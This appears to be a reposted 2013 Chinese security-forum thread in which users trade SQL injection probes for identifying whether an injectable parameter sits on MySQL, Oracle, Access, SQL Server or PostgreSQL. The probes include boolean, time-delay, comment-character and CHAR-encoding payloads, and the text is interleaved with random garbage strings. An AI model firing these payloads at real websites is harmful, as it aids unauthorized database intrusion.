一个注射点如何最快速确认是什么类型数据库$ O( Q. X: Q; t! t" V8 ?
xsser (十根阳具有长短!!) | 2013-02-05 12:36
3 y* n1 p& [" g1 @假设这么一个注射点:% X9 `: }2 O; X' m% i5 H' t
show.html?id=26 Y$ a8 b/ n4 X. g# j
mysql:id=2 and version()>0
# a' u% E, n: p' `6 i- soracle:id=2 and '1'||'1'='11- l! \+ I4 i p( g {0 O/ _
其他的欢迎补充
+ k# C& D% z# w( n7 _1#
; `1 Y4 j& p9 _- U7 [# L- Yupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47( l% `* n9 P! n/ N: r, ^0 ]: O! D
Access:, a+ J' M+ v# J% F" t: G8 P, S
aNd aSc(cHr(97))=97
( G9 C5 O2 O. i) ]$ band exists(select id from MSysAccessObjects)) {2 V5 ~. \+ `: `% N+ g. s
SQL Server:
/ C3 s( F8 ~5 @and exists(select id from sysobjects)" i& s8 y/ y6 O- p. \) r
and length(user)>0
6 p5 j6 |! G% B2 hMySQL:
% V! D- w$ A2 A5 L8 z% zand length(user())>0
4 E. l! t F% \3 t4 u5 h8 l2#
' Z/ c7 N- W9 N" `/ Vxsser (十根阳具有长短!!) | 2013-02-05 12:48; e% [6 X: \* ~
@upload 如果这些都不是呢…. v( j8 x2 m% X0 u' ] q. y
3#
$ a2 J" g4 `! b* P& x' Nupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03
/ q( p$ b9 ^/ v@xsser 不快速的,延时注入
3 g4 {: m0 i" }* b% C* i. G% g( W不知道这样写对不对
7 S+ d! C1 _; m+ Vmssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
. O% t. x; A4 C8 e; D1 Mmysql:id=2 and select benchmark(1e8,current_date());
* j3 B( t3 {$ c4#
& j9 R, n5 T2 W8 D: J/ t( i- Tupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
: r$ u* K& U+ J最快的貌似是看报错信息' f0 Z. f9 ^4 S# f* e4 l
oracle error% N% D# B: p( Z; J; y. \
mssql error2 p1 i" {8 h9 X/ ?: P. w
mysql error
* @, C. U* L: q8 n) j- u5#
3 r2 }, ^$ V8 Q, C4 d( z6 t* G/ `Nimda (你们都是坏银~) | 2013-02-05 13:14
! y$ a4 _1 {" N0 b3 B$ k% U小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual) b' Y) ]8 ^6 ]0 Y7 l: T3 s+ u" o
6#! G" b0 h: g8 x! R7 Q
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
8 m9 z3 [% p2 A9 P) ~7 o6 I“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:
( Q1 g6 d% \$ O2 P& i“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符: v" g5 {: f& X; }, g; P
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。
! A1 Z1 y! {( n2 T* U7#
8 Y$ E9 r" z6 G3 b- \7 {2 U" ]_Evil (HackEnd) | 2013-02-05 13:33 h9 z8 \6 I7 v6 H" {
PostgreSQL
; L" R0 y/ z! W, `. c' B8#
& r+ o" f/ Q( e+ f& bupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:42
% ^0 L3 o* f& y0 x. X切换编码 and 1=10 h- w/ {1 |* ]1 m) O
oracle:
+ y4 E: U) ~- T$ |CHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)% [2 F+ `2 \, L8 y( K$ p
mssql:
& G! L! Z2 a6 c$ S2 f' ~6 i# h( U oCHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)* ^1 D, j) R& X6 f1 Y3 I# u& E! B
mysql:: L, b9 V2 K3 E5 r! J6 c2 [& z
CHAR(97, 110, 100, 32, 49, 61, 49)
" x; W& f* K( |8 p9#
& y/ q4 g# o; [! Pxsser (十根阳具有长短!!) | 2013-02-05 14:31
. L9 t! a+ i# |+ m1 D- R' g; f@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?( f3 e* R. P+ v- w8 v2 m
10#/ v0 j. d# \9 N2 s; j5 T
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
8 Y0 N% m0 o! L N@xsser 是奇葩数据库类型的么?* K c; k5 k( m$ m
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
# e, u( L! L7 Q+ s+ M1.是否可以使用特定的函数来判断,该数据库特有的
: w, H# G" ]3 b% R4 J/ }# j) X! m8 j2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等
. o6 D% }/ e# W0 S3.是否可以编码查询% ?5 [1 c. x4 L6 r% }, F
4.是否显可以利用错信息
# `- k( R" r' j8 q% j5.是否存在数据库某些特性辅助判断
) o# p3 x; V9 L n4 T8 Z" r( P个人见解+ L9 \9 u9 ^# Z% p# U8 A& C. y
11#7 }: }, [1 j6 o$ r
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55! X' O. |8 j" q. _
已收藏,mssql可以直接看到错误提示的吧~
- {! o: t5 @! J; l/ E/ a2 y12#0 N9 S w! ], w) _) w8 J/ n4 |5 t7 D7 }
Passer_by | 2013-02-05 15:09, M7 z- ~0 U$ ]8 [& V) ~! L" l
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。
7 @' R }7 M; G% o+ u( n mfrom:http://zone.wooyun.org/content/260 |
发表于 2013-2-11 09:54:04
收藏
支持
反对